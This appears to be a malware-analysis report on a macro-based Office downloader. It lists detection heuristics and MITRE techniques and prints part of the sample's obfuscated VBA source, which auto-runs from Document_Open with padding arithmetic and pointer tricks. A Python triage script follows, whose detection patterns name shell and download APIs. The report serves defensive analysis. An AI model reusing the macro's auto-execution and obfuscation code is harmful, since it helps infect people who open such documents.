Verdict: MALICIOUS
Risk Score: 202

Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The file is an Office document carrying a VBA macro whose entry point is the Document_Open event, so it runs as soon as the document is opened with macros enabled. The heuristics flag a GetObject call and, in the compiled p-code stream, an auto-execution token alongside shell/download/object-execution tokens; together with the ClamAV signature Doc.Downloader.Macro-6539595-0 this is consistent with a macro-based downloader that fetches and executes a second-stage payload. The decoded source is heavily obfuscated: dictionary-word identifiers, assignments to variables that are never read, #If ... Win64 conditional-compilation guards padded with arithmetic, VarPtr/LongPtr pointer values handed to helper functions (currunt, eschscholtzia) whose definitions fall outside the preview, and Pmt calls whose results are discarded. No specific family could be identified.
Heuristics (6)

- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  All four are XML namespace identifiers from embedded XMP/RDF metadata (typically carried by an embedded image), not download or command-and-control addresses, and should not be treated as network indicators.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49464 bytes |

SHA-256: b5269f6485dab88adb314479c288f0770dfa00883f5fa1a521f91f9260239f3d

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Private Sub Document_Open()
Dim raveup As Long
Dim catalo As Integer
autoradiographic = "pensee"
inexhaustible = magsman
lazarillo
catostomus = 52 + 9
Pmt 0, catostomus, 26008, 58110, 6
End Sub
Function assert(pathetically)
Dim bloated As String
Dim baddeleyite As Integer
Dim center As Variant
Dim spinster As Byte
#If (36 - 10 + 374 + 105 - 115 + 310) > ((23 - 14 + 311) - (49 - 58 + 549) * 1) And ((105 - 83 + 6) - (47 - 88 + 69)) * 2 < (Win64) Then
Dim constructive As Variant
Dim ceratosaur As LongPtr
mainframe = 59 - 28 - 23
Dim conventionalism As LongPtr
Dim babar As Long
Dim assail As Integer
Dim dafe As LongPtr
Dim leiopelma As Byte
audita = VarPtr(ceratosaur)
fascicule = currunt(audita, VarPtr(pathetically) + (63 - 20 - 35), mainframe)
#ElseIf (34 - 97 + 463 + 58 - 116 + 358) > ((82 - 67 + 305) - (33 - 83 + 590) * 1) And Not ((88 - 34 - 26) - (22 - 49 + 55)) * 2 < (Win64) Then
Dim ceratosaur As Long
mainframe = 37 - 80 + 47
Dim conventionalism As Long
Dim dafe As Long
audita = VarPtr(ceratosaur)
fascicule = eschscholtzia(audita, VarPtr(pathetically) + (71 - 84 + 21), mainframe)
#End If
savory = 69 - 104 + 34
conventionalism = 25 - 106 + 81
uncertified = 20 - 82 + 62
dafe = 106 - 69 + 9720
giovane = 22 - 92 + 4166
remiform = 39 - 114 + 139
emphysema = underpants(ByVal savory, _
conventionalism, ByVal uncertified, dafe, ByVal giovane, _
ByVal remiform)
pontifical = Fix(246)
demonolatry = bibliographic
#If (48 - 17 + 369 + 98 - 92 + 294) > ((17 - 4 + 307) - (2 - 65 + 603) * 1) And ((98 - 111 + 41) - (83 - 96 + 41)) * 2 < (Win64) Then
restitution = currunt(conventionalism, ceratosaur, 90 - 117 + 5910)
#ElseIf (86 - 119 + 433 + 107 - 76 + 269) > ((111 - 104 + 313) - (83 - 49 + 506) * 1) And Not ((9 - 3 + 22) - (10 - 46 + 64)) * 2 < (Win64) Then
disomatous = eschscholtzia(conventionalism, ceratosaur, 126 - 112 + 5869)
#End If
aloofness = 52 + 44
Pmt 0, aloofness, 34624, 32256, 5
assert = conventionalism
End Function
Sub lazarillo()
Dim balmy As Integer
Dim airspace As Integer
cacogenesis.bairdiella.Value = Day(#12/5/2013#)
varday = communicational = "colutea"
circulating = "produce"
mated = "avellan"
chaucer = pastry
hoecake = conjecturality
unagitated = "interoceptive"
analecta = "yangtze"
Set bout = cacogenesis.bairdiella.SelectedItem
because = 53 + 46
Pmt 0, because, 21129, 29989, 6
frankness = bout.Name
doubleshotted = 94 - 10 + 7760
epacridaceae = Right(frankness, doubleshotted)
bestow = bosniaherzegovina.processed(epacridaceae)
plangent = 60 + 10
Pmt 0, plangent, 11771, 19776, 2
ameliorate = "caraffe"
#If (60 - 102 + 442 + 28 - 102 + 374) > ((125 - 58 + 253) - (122 - 34 + 452) * 1) And ((2 - 17 + 43) - (58 - 16 - 14)) * 2 < (Win64) Then
Dim arrastra As Variant
Dim conclude As LongPtr
Dim aphrodite As LongPtr
Dim archine As Variant
#ElseIf (107 - 13 + 306 + 3 - 121 + 418) > ((19 - 23 + 324) - (63 - 106 + 583) * 1) And Not ((105 - 49 - 28) - (83 - 48 - 7)) * 2 < (Win64) Then
Dim netscape As Variant
Dim aphrodite As Long
Dim lift As Byte
Dim conclude As Long
#End If
thraupidae = 94 - 70 - 24
caryophyllidae = "multidimensional"
challis = 128 - 105 + 4073
goth = 8 + 16
Pmt 0, goth, 9442, 33585, 7
forbears = "bhadon"
stirringly = "attain"
pulsation = "circuitously"
devoured = 21 + 60
Pmt 0, devoured, 25229, 13385, 2
outpouring = bestow
cucurbitaceae = beasts
... (truncated)
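The source-level checks behind the heuristics above (a Document_Open entry point, a GetObject call, an auto-exec token together with execution-capable tokens) can be re-run on the decoded macros.bas, and the arithmetic padding the sample uses can be folded away to expose the real constants. The script below is an added example written for this report, not the analyzer's or oletools' own code. It works on a constructed excerpt assembled from lines of the preview above plus one constructed `Set bout = GetObject(target)` line, which stands in for the call the report flags beyond the truncated preview. The token list and the inclusion of VarPtr/LongPtr as execution-relevant are this example's choices. In practice the source text comes from `oletools.olevba.VBA_Parser(path).extract_macros()`, which is what the report's extractor uses; the p-code rule itself runs on the compiled stream, so when source extraction fails the same token scan would be applied to a pcodedmp disassembly instead.

```python
"""Triage of an olevba-extracted VBA macro: the report's Document_Open /
GetObject / auto-exec-plus-execution-token checks re-run on decoded source,
plus constant folding for the arithmetic padding this sample uses.
Added example for this report, not the analyzer's own code."""
import re
from collections import Counter

# Constructed excerpt: lines from the macros.bas preview, plus one GetObject
# line (constructed) standing in for the call flagged beyond the preview.
SAMPLE_VBA = """\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim raveup As Long
    autoradiographic = "pensee"
    lazarillo
    catostomus = 52 + 9
    Pmt 0, catostomus, 26008, 58110, 6
End Sub
Function assert(pathetically)
    #If (36 - 10 + 374 + 105 - 115 + 310) > ((23 - 14 + 311) - (49 - 58 + 549) * 1) And ((105 - 83 + 6) - (47 - 88 + 69)) * 2 < (Win64) Then
    Dim ceratosaur As LongPtr
    mainframe = 59 - 28 - 23
    audita = VarPtr(ceratosaur)
    fascicule = currunt(audita, VarPtr(pathetically) + (63 - 20 - 35), mainframe)
    #End If
    dafe = 106 - 69 + 9720
End Function
Sub lazarillo()
    doubleshotted = 94 - 10 + 7760
    epacridaceae = Right(frankness, doubleshotted)
    Set bout = GetObject(target)   ' constructed stand-in for the flagged call
End Sub
"""

# Entry points Office runs on open/close without further user action.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|Document_Close|AutoOpen|Auto_Open|AutoExec|AutoClose|"
    r"Auto_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE)

# Tokens giving object-creation, shell, download or raw-memory capability.
# VarPtr/LongPtr are included (example's choice) because this sample hands
# pointers to helper functions, a common prelude to in-memory payload work.
EXEC_TOKEN_RE = re.compile(
    r"\b(GetObject|CreateObject|ShellExecute|Shell|WScript\.Shell|"
    r"URLDownloadToFile|XMLHTTP|WinHttpRequest|RtlMoveMemory|"
    r"Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)|VarPtr|LongPtr)\b",
    re.IGNORECASE)

# Integer add/subtract chains used as padding, e.g. "106 - 69 + 9720".
# The lookarounds keep matches out of identifiers, decimals and #date# literals.
ARITH_RE = re.compile(r"(?<![\w.#])\d+(?:\s*[-+]\s*\d+)+(?![\w.#])")

# Pmt (a financial function) invoked as a statement with its result dropped.
PMT_RE = re.compile(r"^\s*Pmt\b", re.IGNORECASE | re.MULTILINE)


def _eval_chain(expr: str) -> int:
    """Evaluate a chain of signed integer terms without calling eval()."""
    total = 0
    for sign, num in re.findall(r"([-+]?)\s*(\d+)", expr):
        total += -int(num) if sign == "-" else int(num)
    return total


def fold_arithmetic(src: str):
    """Replace every padding chain by its value; return (text, count)."""
    return ARITH_RE.subn(lambda m: str(_eval_chain(m.group(0))), src)


def triage(src: str) -> dict:
    """Apply the report's source-level checks and summarise the obfuscation."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)},
                      key=str.lower)
    tokens = Counter(m.group(1).lower() for m in EXEC_TOKEN_RE.finditer(src))
    folded, n_folded = fold_arithmetic(src)
    return {
        "OLE_VBA_DOCOPEN": any(n.lower() == "document_open" for n in autoexec),
        "OLE_VBA_GETOBJ": "getobject" in tokens,
        # The report's p-code rule applied to source: an auto-exec entry
        # point together with at least one execution-capable token.
        "AUTOEXEC_WITH_EXEC_TOKENS": bool(autoexec) and bool(tokens),
        "autoexec_entries": autoexec,
        "exec_tokens": dict(tokens),
        "padding_expressions_folded": n_folded,
        "discarded_pmt_calls": len(PMT_RE.findall(src)),
        "folded_source": folded,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for key, value in result.items():
        print(f"{key}: {value}" if key != "folded_source" else value)
```

After folding, the conditional-compilation guard reads `#If (700) > ((320) - (540) * 1) And ((28) - (28)) * 2 < (Win64) Then`: the left clause is always true and the right reduces to `0 < Win64`, so the branch is decided by the Win64 conditional-compilation constant alone and the arithmetic carries no logic of its own. The same folding turns `doubleshotted = 94 - 10 + 7760` into `7844`, the length passed to `Right(frankness, ...)` in lazarillo.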